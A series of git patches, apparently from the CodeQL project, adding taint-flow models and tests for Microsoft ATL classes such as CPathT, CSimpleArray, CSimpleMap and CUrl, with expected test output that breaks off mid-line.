.../dataflow/taint-tests/atl.cpp | 2 +- 2 files changed, 23 insertions(+), 1 deletion(-) create mode 100644 cpp/ql/lib/ext/CPathT.model.yml diff --git a/cpp/ql/lib/ext/CPathT.model.yml b/cpp/ql/lib/ext/CPathT.model.yml new file mode 100644 index 00000000000..2138dd6c942 --- /dev/null +++ b/cpp/ql/lib/ext/CPathT.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CPathT", True, "CPathT", "", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["", "CPathT", True, "AddExtension", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CPathT", True, "Append", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CPathT", True, "Combine", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CPathT", True, "Combine", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["", "CPathT", True, "CommonPrefix", "", "", "Argument[*0]", "ReturnValue", "taint", "manual"] + - ["", "CPathT", True, "CommonPrefix", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CPathT", True, "GetExtension", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CPathT", True, "RelativePathTo", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"] + - ["", "CPathT", True, "RelativePathTo", "", "", "Argument[*2]", "ReturnValue[-1]", "taint", "manual"] + - ["", "CPathT", True, "RenameExtension", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"] + # Note: These don't work currently since we cannot use the template parameter in the name of the function + # - ["", "CPathT", True, "operator const T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + # - ["", "CPathT", True, "operator T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["", "CPathT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["", "CPathT", True, "operator +=", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["", "CPathT", True, "operator +=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 35a66099a62..d6b7b6d2d6f 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -703,6 +703,6 @@ void test_CPathT() { CPath p; auto p2 = p.CommonPrefix(x); sink(p2.m_strPath); // $ MISSING: ir - sink(p2.GetExtension()); // $ MISSING: ir + sink(p2.GetExtension()); // $ ir } } From c61395b9733b1236d05026030378260100a04586 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:18:16 +0000 Subject: [PATCH 0735/1267] C++: Add implicit read of the 'm_strPath' member. --- cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../code/cpp/models/implementations/CPathT.qll | 16 ++++++++++++++++ .../library-tests/dataflow/taint-tests/atl.cpp | 18 +++++++++--------- 3 files changed, 26 insertions(+), 9 deletions(-) create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index 9e67eaae5cf..b371e6dc116 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -52,3 +52,4 @@ private import implementations.ZMQ private import implementations.Win32CommandExecution private import implementations.CA2AEX private import implementations.CComBSTR +private import implementations.CPathT diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll new file mode 100644 index 00000000000..b2fe3a363c7 --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll @@ -0,0 +1,16 @@ +private import cpp +private import semmle.code.cpp.ir.dataflow.FlowSteps +private import semmle.code.cpp.dataflow.new.DataFlow + +/** The `CPathT` class from the Microsoft "Active Template Library". */ +class CPathT extends Class { + CPathT() { this.hasGlobalName("CPathT") } +} + +private class MStrPath extends Field { + MStrPath() { this.getDeclaringType() instanceof CPathT and this.hasName("m_strPath") } +} + +private class MStrPathTaintInheritingContent extends TaintInheritingContent, DataFlow::FieldContent { + MStrPathTaintInheritingContent() { this.getField() instanceof MStrPath } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index d6b7b6d2d6f..46a147e555a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -664,45 +664,45 @@ void test_CPathT() { char* x = indirect_source(); CPath p(x); sink(static_cast(p)); // $ MISSING: ir - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir CPath p2(p); - sink(p2.m_strPath); // $ MISSING: ir + sink(p2.m_strPath); // $ ir { CPath p; p.AddExtension(x); - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir } { CPath p; p.Append(x); - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir CPath p2; p2 += p; - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir CPath p3; p3 += x; - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir } { CPath p; p.Combine(x, nullptr); - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir } { CPath p; p.Combine(nullptr, x); - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir } { CPath p; auto p2 = p.CommonPrefix(x); - sink(p2.m_strPath); // $ MISSING: ir + sink(p2.m_strPath); // $ ir sink(p2.GetExtension()); // $ ir } } From 029c0134eba01f629b1a0e7ffba4d98fb093ccef Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:20:24 +0000 Subject: [PATCH 0736/1267] C++: Add failing tests with 'CSimpleArray'. --- .../dataflow/taint-tests/atl.cpp | 47 +++++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 46 ++++++++++++++++++ 2 files changed, 93 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 46a147e555a..e2150016641 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -706,3 +706,50 @@ void test_CPathT() { sink(p2.GetExtension()); // $ ir } } + +template +struct CSimpleArray { + CSimpleArray(const CSimpleArray& src); + CSimpleArray(); + ~CSimpleArray(); + + BOOL Add(const T& t); + int Find(const T& t) const; + T* GetData() const; + int GetSize() const; + BOOL Remove(const T& t); + void RemoveAll(); + BOOL RemoveAt(int nIndex); + + BOOL SetAtIndex( + int nIndex, + const T& t); + + T& operator[](int nindex); + CSimpleArray & operator=(const CSimpleArray& src); +}; + +void test_CSimpleArray() { + int x = source(); + { + CSimpleArray a; + a.Add(x); + sink(a[0]); // $ MISSING: ir + a.Add(0); + sink(a[0]); // $ MISSING: ir + + CSimpleArray a2; + sink(a2[0]); + a2 = a; + sink(a2[0]); // $ MISSING: ir + } + { + CSimpleArray a; + a.Add(x); + sink(a.GetData()); // $ MISSING: ir + + CSimpleArray a2; + int pos = a2.Find(x); + sink(a2[pos]); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 961011dbd23..952f67e2a54 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -800,6 +800,52 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:705:10:705:11 | p2 | | | atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:706:10:706:11 | p2 | | | atl.cpp:705:10:705:11 | p2 [post update] | atl.cpp:706:10:706:11 | p2 | | +| atl.cpp:733:11:733:21 | call to source | atl.cpp:736:11:736:11 | x | | +| atl.cpp:733:11:733:21 | call to source | atl.cpp:748:11:748:11 | x | | +| atl.cpp:733:11:733:21 | call to source | atl.cpp:752:23:752:23 | x | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:736:5:736:5 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:737:10:737:10 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:738:5:738:5 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:739:10:739:10 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:743:10:743:10 | a | | +| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:745:3:745:3 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:737:10:737:10 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:738:5:738:5 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:739:10:739:10 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:743:10:743:10 | a | | +| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:745:3:745:3 | a | | +| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:738:5:738:5 | a | | +| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:739:10:739:10 | a | | +| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:743:10:743:10 | a | | +| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:745:3:745:3 | a | | +| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:739:10:739:10 | a | | +| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:743:10:743:10 | a | | +| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:745:3:745:3 | a | | +| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:743:10:743:10 | a | | +| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:745:3:745:3 | a | | +| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:742:10:742:11 | a2 | | +| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:743:5:743:6 | a2 | | +| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:744:10:744:11 | a2 | | +| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:745:3:745:3 | a2 | | +| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:743:5:743:6 | a2 | | +| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:744:10:744:11 | a2 | | +| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | +| atl.cpp:743:5:743:6 | ref arg a2 | atl.cpp:744:10:744:11 | a2 | | +| atl.cpp:743:5:743:6 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | +| atl.cpp:743:10:743:10 | a | atl.cpp:743:5:743:6 | ref arg a2 | TAINT | +| atl.cpp:743:10:743:10 | a | atl.cpp:743:8:743:8 | call to operator= | TAINT | +| atl.cpp:744:10:744:11 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | +| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:748:5:748:5 | a | | +| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:749:10:749:10 | a | | +| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:754:3:754:3 | a | | +| atl.cpp:748:5:748:5 | ref arg a | atl.cpp:749:10:749:10 | a | | +| atl.cpp:748:5:748:5 | ref arg a | atl.cpp:754:3:754:3 | a | | +| atl.cpp:749:10:749:10 | ref arg a | atl.cpp:754:3:754:3 | a | | +| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:752:15:752:16 | a2 | | +| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:753:10:753:11 | a2 | | +| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:754:3:754:3 | a2 | | +| atl.cpp:752:18:752:21 | call to Find | atl.cpp:753:13:753:15 | pos | | +| atl.cpp:753:10:753:11 | ref arg a2 | atl.cpp:754:3:754:3 | a2 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 02b88d5dbdafd21fb67ad6e94c42a7be6494f5f6 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:29:32 +0000 Subject: [PATCH 0737/1267] C++: Add MaD model for 'CSimpleArray'. --- cpp/ql/lib/ext/CSimpleArray.model.yml | 11 +++++++++++ .../test/library-tests/dataflow/taint-tests/atl.cpp | 8 ++++---- 2 files changed, 15 insertions(+), 4 deletions(-) create mode 100644 cpp/ql/lib/ext/CSimpleArray.model.yml diff --git a/cpp/ql/lib/ext/CSimpleArray.model.yml b/cpp/ql/lib/ext/CSimpleArray.model.yml new file mode 100644 index 00000000000..1c6337bf74c --- /dev/null +++ b/cpp/ql/lib/ext/CSimpleArray.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CSimpleArray", True, "CSimpleArray", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleArray", True, "Add", "", "", "Argument[*0]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CSimpleArray", True, "SetAtIndex", "", "", "Argument[*1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index e2150016641..531ca573c94 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -734,19 +734,19 @@ void test_CSimpleArray() { { CSimpleArray a; a.Add(x); - sink(a[0]); // $ MISSING: ir + sink(a[0]); // $ ir a.Add(0); - sink(a[0]); // $ MISSING: ir + sink(a[0]); // $ ir CSimpleArray a2; sink(a2[0]); a2 = a; - sink(a2[0]); // $ MISSING: ir + sink(a2[0]); // $ ir } { CSimpleArray a; a.Add(x); - sink(a.GetData()); // $ MISSING: ir + sink(a.GetData()); // $ ir CSimpleArray a2; int pos = a2.Find(x); From 12674ea2e619613a482b3b3ac5875653d513ba51 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:31:45 +0000 Subject: [PATCH 0738/1267] C++: Add failing tests with 'CSimpleMap'. --- .../dataflow/taint-tests/atl.cpp | 55 +++++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 42 ++++++++++++++ 2 files changed, 97 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 531ca573c94..44c5df7018f 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -753,3 +753,58 @@ void test_CSimpleArray() { sink(a2[pos]); // $ MISSING: ir } } + +template +struct CSimpleMap { + CSimpleMap(); + ~CSimpleMap(); + + BOOL Add(const TKey& key, const TVal& val); + int FindKey(const TKey& key) const; + int FindVal(const TVal& val) const; + TKey& GetKeyAt(int nIndex) const; + int GetSize() const; + TVal& GetValueAt(int nIndex) const; + TVal Lookup(const TKey& key) const; + BOOL Remove(const TKey& key); + void RemoveAll(); + BOOL RemoveAt(int nIndex); + TKey ReverseLookup(const TVal& val) const; + BOOL SetAt(const TKey& key, const TVal& val); + BOOL SetAtIndex(int nIndex, const TKey& key, const TVal& val); +}; + +void test_CSimpleMap() { + wchar_t* x = source(); + { + CSimpleMap a; + a.Add("hello", x); + sink(a.Lookup("hello")); // $ MISSING: ir + } + { + CSimpleMap a; + auto pos = a.FindKey("hello"); + sink(a.GetValueAt(pos)); // $ MISSING: ir + } + { + CSimpleMap a; + auto pos = a.FindVal(x); + sink(a.GetValueAt(pos)); // $ MISSING: ir + } + { + CSimpleMap a; + auto key = a.ReverseLookup(x); + sink(key); + sink(a.Lookup(key)); // $ MISSING: ir + } + { + CSimpleMap a; + a.SetAt("hello", x); + sink(a.Lookup("hello")); // $ MISSING: ir + } + { + CSimpleMap a; + a.SetAtIndex(0, "hello", x); + sink(a.Lookup("hello")); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 952f67e2a54..395ba48f967 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -846,6 +846,48 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:754:3:754:3 | a2 | | | atl.cpp:752:18:752:21 | call to Find | atl.cpp:753:13:753:15 | pos | | | atl.cpp:753:10:753:11 | ref arg a2 | atl.cpp:754:3:754:3 | a2 | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:781:20:781:20 | x | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:791:26:791:26 | x | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:796:32:796:32 | x | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:802:22:802:22 | x | | +| atl.cpp:778:16:778:31 | call to source | atl.cpp:807:30:807:30 | x | | +| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:781:5:781:5 | a | | +| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:782:10:782:10 | a | | +| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:783:3:783:3 | a | | +| atl.cpp:781:5:781:5 | ref arg a | atl.cpp:782:10:782:10 | a | | +| atl.cpp:781:5:781:5 | ref arg a | atl.cpp:783:3:783:3 | a | | +| atl.cpp:782:10:782:10 | ref arg a | atl.cpp:783:3:783:3 | a | | +| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:786:16:786:16 | a | | +| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:787:10:787:10 | a | | +| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:788:3:788:3 | a | | +| atl.cpp:786:18:786:24 | call to FindKey | atl.cpp:787:23:787:25 | pos | | +| atl.cpp:787:10:787:10 | ref arg a | atl.cpp:788:3:788:3 | a | | +| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:791:16:791:16 | a | | +| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:792:10:792:10 | a | | +| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:793:3:793:3 | a | | +| atl.cpp:791:18:791:24 | call to FindVal | atl.cpp:792:23:792:25 | pos | | +| atl.cpp:792:10:792:10 | ref arg a | atl.cpp:793:3:793:3 | a | | +| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:796:16:796:16 | a | | +| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:798:10:798:10 | a | | +| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:799:3:799:3 | a | | +| atl.cpp:796:16:796:16 | ref arg a | atl.cpp:798:10:798:10 | a | | +| atl.cpp:796:16:796:16 | ref arg a | atl.cpp:799:3:799:3 | a | | +| atl.cpp:796:18:796:30 | call to ReverseLookup | atl.cpp:797:10:797:12 | key | | +| atl.cpp:796:18:796:30 | call to ReverseLookup | atl.cpp:798:19:798:21 | key | | +| atl.cpp:797:10:797:12 | ref arg key | atl.cpp:798:19:798:21 | key | | +| atl.cpp:798:10:798:10 | ref arg a | atl.cpp:799:3:799:3 | a | | +| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:802:5:802:5 | a | | +| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:803:10:803:10 | a | | +| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:804:3:804:3 | a | | +| atl.cpp:802:5:802:5 | ref arg a | atl.cpp:803:10:803:10 | a | | +| atl.cpp:802:5:802:5 | ref arg a | atl.cpp:804:3:804:3 | a | | +| atl.cpp:803:10:803:10 | ref arg a | atl.cpp:804:3:804:3 | a | | +| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:807:5:807:5 | a | | +| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:808:10:808:10 | a | | +| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:809:3:809:3 | a | | +| atl.cpp:807:5:807:5 | ref arg a | atl.cpp:808:10:808:10 | a | | +| atl.cpp:807:5:807:5 | ref arg a | atl.cpp:809:3:809:3 | a | | +| atl.cpp:808:10:808:10 | ref arg a | atl.cpp:809:3:809:3 | a | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 74b6c9dcc75731e0922b47b085d8c058d7d6ef69 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:36:48 +0000 Subject: [PATCH 0739/1267] C++: Add MaD model for 'CSimpleMap'. --- cpp/ql/lib/ext/CSimpleMap.model.yml | 12 ++++++++++++ .../test/library-tests/dataflow/taint-tests/atl.cpp | 6 +++--- 2 files changed, 15 insertions(+), 3 deletions(-) create mode 100644 cpp/ql/lib/ext/CSimpleMap.model.yml diff --git a/cpp/ql/lib/ext/CSimpleMap.model.yml b/cpp/ql/lib/ext/CSimpleMap.model.yml new file mode 100644 index 00000000000..323b5be0174 --- /dev/null +++ b/cpp/ql/lib/ext/CSimpleMap.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CSimpleMap", True, "Add", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleMap", True, "GetValueAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "taint", "manual"] + - ["", "CSimpleMap", True, "Lookup", "", "", "Argument[-1].Element[@]", "ReturnValue.Element[@]", "value", "manual"] + - ["", "CSimpleMap", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleMap", True, "SetAtIndex", "", "", "Argument[*@2]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleMap", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CSimpleMap", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 44c5df7018f..fe76e3f2f93 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -779,7 +779,7 @@ void test_CSimpleMap() { { CSimpleMap a; a.Add("hello", x); - sink(a.Lookup("hello")); // $ MISSING: ir + sink(a.Lookup("hello")); // $ ir } { CSimpleMap a; @@ -800,11 +800,11 @@ void test_CSimpleMap() { { CSimpleMap a; a.SetAt("hello", x); - sink(a.Lookup("hello")); // $ MISSING: ir + sink(a.Lookup("hello")); // $ ir } { CSimpleMap a; a.SetAtIndex(0, "hello", x); - sink(a.Lookup("hello")); // $ MISSING: ir + sink(a.Lookup("hello")); // $ ir } } From 1ea879a880c0e409b56f45248f55a35493b4d0fa Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:38:10 +0000 Subject: [PATCH 0740/1267] C++: Add failing tests for 'CUrl'. --- .../dataflow/taint-tests/atl.cpp | 89 +++++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 66 ++++++++++++++ 2 files changed, 155 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index fe76e3f2f93..1727684b51a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -808,3 +808,92 @@ void test_CSimpleMap() { sink(a.Lookup("hello")); // $ ir } } + +struct CUrl { + CUrl& operator= (const CUrl& urlThat) throw(); + CUrl() throw(); + CUrl(const CUrl& urlThat) throw(); + ~CUrl() throw(); + + inline BOOL Canonicalize(DWORD dwFlags) throw(); + inline void Clear() throw(); + + BOOL CrackUrl(LPCTSTR lpszUrl, DWORD dwFlags) throw(); + inline BOOL CreateUrl(LPTSTR lpszUrl, DWORD* pdwMaxLength, DWORD dwFlags) const throw(); + + inline LPCTSTR GetExtraInfo() const throw(); + inline DWORD GetExtraInfoLength() const throw(); + inline LPCTSTR GetHostName() const throw(); + inline DWORD GetHostNameLength() const throw(); + inline LPCTSTR GetPassword() const throw(); + inline DWORD GetPasswordLength() const throw(); + inline ATL_URL_PORT GetPortNumber() const throw(); + inline ATL_URL_SCHEME GetScheme() const throw(); + inline LPCTSTR GetSchemeName() const throw(); + inline DWORD GetSchemeNameLength() const throw(); + inline DWORD GetUrlLength() const throw(); + inline LPCTSTR GetUrlPath() const throw(); + inline DWORD GetUrlPathLength() const throw(); + inline LPCTSTR GetUserName() const throw(); + inline DWORD GetUserNameLength() const throw(); + inline BOOL SetExtraInfo(LPCTSTR lpszInfo) throw(); + inline BOOL SetHostName(LPCTSTR lpszHost) throw(); + inline BOOL SetPassword(LPCTSTR lpszPass) throw(); + inline BOOL SetPortNumber(ATL_URL_PORT nPrt) throw(); + inline BOOL SetScheme(ATL_URL_SCHEME nScheme) throw(); + inline BOOL SetSchemeName(LPCTSTR lpszSchm) throw(); + inline BOOL SetUrlPath(LPCTSTR lpszPath) throw(); + inline BOOL SetUserName(LPCTSTR lpszUser) throw(); +}; + +void test_CUrl() { + char* x = indirect_source(); + CUrl url; + url.CrackUrl(x, 0); + sink(url); // $ MISSING: ir + sink(url.GetExtraInfo()); // $ MISSING: ir + sink(url.GetHostName()); // $ MISSING: ir + sink(url.GetPassword()); // $ MISSING: ir + sink(url.GetSchemeName()); // $ MISSING: ir + sink(url.GetUrlPath()); // $ MISSING: ir + sink(url.GetUserName()); // $ MISSING: ir + + { + CUrl url2; + DWORD len; + char buffer[1024]; + url2.CrackUrl(x, 0); + url2.CreateUrl(buffer, &len, 0); + sink(buffer); // $ ast MISSING: ir + } + { + CUrl url2; + url2.SetExtraInfo(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetHostName(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetPassword(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetSchemeName(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetUrlPath(x); + sink(url2); // $ MISSING: ir + } + { + CUrl url2; + url2.SetUserName(x); + sink(url2); // $ MISSING: ir + } +} \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 395ba48f967..3f77cb77b9c 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -888,6 +888,72 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:807:5:807:5 | ref arg a | atl.cpp:808:10:808:10 | a | | | atl.cpp:807:5:807:5 | ref arg a | atl.cpp:809:3:809:3 | a | | | atl.cpp:808:10:808:10 | ref arg a | atl.cpp:809:3:809:3 | a | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:852:16:852:16 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:865:19:865:19 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:871:23:871:23 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:876:22:876:22 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:881:22:881:22 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:886:24:886:24 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:891:21:891:21 | x | | +| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:896:22:896:22 | x | | +| atl.cpp:851:8:851:10 | call to 